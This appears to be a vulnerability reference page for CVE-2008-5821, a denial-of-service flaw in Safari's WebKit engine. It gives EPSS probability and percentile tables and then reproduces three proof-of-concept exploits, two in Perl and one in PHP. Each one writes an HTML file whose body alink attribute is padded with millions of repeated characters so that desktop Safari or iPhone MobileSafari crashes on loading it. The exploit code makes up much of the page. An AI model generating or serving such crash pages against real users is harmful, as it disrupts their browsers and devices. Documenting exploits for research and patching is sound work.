CVE-2008-5821 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	4.19%	–	–
2022-04-03	–	–	4.19%	–	–
2022-07-17	–	–	4.19%	–	–
2023-03-12	–	–	–	5.65%	–
2023-05-28	–	–	–	8.1%	–
2023-07-09	–	–	–	11.03%	–
2023-08-13	–	–	–	19.49%	–
2024-06-02	–	–	–	19.49%	–
2024-11-03	–	–	–	18.64%	–
2025-01-12	–	–	–	24.1%	–
2025-01-19	–	–	–	24.1%	–
2025-03-18	–	–	–	–	11.86%
2025-03-18	–	–	–	–	11.86,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	7%
2022-04-03	86%
2022-07-17	87%
2023-03-12	92%
2023-05-28	93%
2023-07-09	94%
2023-08-13	96%
2024-06-02	96%
2024-11-03	96%
2025-01-12	97%
2025-01-19	97%
2025-03-18	93%
2025-03-18	93%

source: https://www.securityfocus.com/bid/33080/info Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition. Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected. Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable. #!/usr/bin/perl # safari_webkit_ml.pl # Safari (Webkit) 3.2 Remote Memory Leak Exploit # Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com] # Access violation when writing to [00000018] # EIP 6B00A02B WebKit.6B00A02B # LastError 00000008 ERROR_NOT_ENOUGH_MEMORY # Memory leaks are common in browsers.. tested on Vista SP1 # Compliments of bf2 $filename = $ARGV[0]; if(!defined($filename)) { print "Usage: $0 <filename.html>\n"; } $head = "<html>" . "\n"; $trig = "<body alink=\"" . "A/" x 10000000 . "\">" . "\n"; $foot = "</html>"; $data = $head . $trig . $foot; open(FILE, '>' . $filename); print FILE $data; close(FILE); exit;

source: https://www.securityfocus.com/bid/33080/info Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library. Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition. Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected. Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable. <?php # _ ____ __ __ ___ # (_)____ _ __/ __ \/ /_____ ____/ / _/_/ | # / // __ \ | / / / / / //_/ _ \/ __ / / / / / # / // / / / |/ / /_/ / ,< / __/ /_/ / / / / / # /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/ # Live by the byte |_/_/ # # Members: # # Pr0T3cT10n # -=M.o.B.=- # TheLeader # Sro # Debug # # Contact: inv0ked.israel@gmail.com # # ----------------------------------- # The following code is a proof of concept for a crash vulnerability that exists in 'Apple iPhone MobileSafari'. # Point your browser to the created(crash.html) file and see what happen ;) # The vulnerable tag is: # * <body alink="A x 12000085"> # ----------------------------------- # Exploit Title: Apple iPhone Safari (body alink) Remote Crash # Date: 19/12/2010 # Author: Pr0T3cT10n # Affected Version: IOS 4.0.1 # Tested on Apple iPhone 3, IOS 4.0.1 MobileSafari # Launch Safari, point your browser to the page and safari will crash. # ISRAEL, NULLBYTE.ORG.IL $string = str_repeat('A', 12000085); $code = "<html> <head> <title>Apple iPhone Safari (body alink) Remote Crash</title> </head> <body alink='{$string}'> </body> </html>"; if(file_put_contents("./crash.html", $code)) { echo("Point your safari mobile browser to `crash.html`.\r\n"); } else { echo("Cannot create file.\r\n"); } ?>

#!/usr/bin/perl # Safari 4.0.5 (531.22.7) Denial of Service # Exploit Title: [Safari 4.0.5 (531.22.7) Denial of Service] # Date: [2010-04-26] # Author: [Xss mAn] # Software Link: [http://www.apple.com/safari/download/] # Version: [Safari 4.0.5 (531.22.7)] # Tested on: [windows 7] #Gr33t [2] : T-T34M $headr1="<HTML>\n<style type=\"text\/css\"\>\n"; $headr2="\nbody {alink: "."A/" x 13333337 ."}\n"; $headr3="</style>\n</HTML>"; open(file ,'>>Crash.html'); print file $headr1.$headr2.$headr3; close(file); #perl 4 M3N ;)